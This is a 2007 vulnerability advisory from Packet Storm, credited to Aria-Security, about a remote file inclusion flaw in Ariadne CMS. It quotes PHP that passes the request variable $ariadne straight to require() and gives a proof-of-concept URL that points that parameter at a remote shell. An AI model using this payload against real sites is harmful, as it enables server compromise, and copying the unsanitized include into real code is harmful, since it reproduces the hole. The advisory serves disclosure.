ariadnecms-rfi.txt

2007-08-08T00:00:00
ID PACKETSTORM:58352
Type packetstorm
Reporter aria-security.net
Modified 2007-08-08T00:00:00

Description

                                        
                                            `_________________________  
  
A R I A - S E C U R I T Y  
_________________________  
  
Ariadne CMS Remote File Inclusion  
Vendor: http://www.ariadne-cms.org/  
  
  
Source Code:  
  
  
<?php  
require("./ariadne.inc");  
require($ariadne."/configs/ariadne.phtml");  
  
$PATH_INFO = $HTTP_SERVER_VARS["PATH_INFO"];  
?>  
<html>  
<head>  
<script>  
function LoadingDone() {  
parent.LoadingDone();  
}  
  
  
PoC:  
http://site.com/path/view.php?ariadne=SHELL?  
  
  
  
  
  
Credits: Aria-Security Team  
http://Aria-Security.net  
http://outlaw.aria-security.info  
`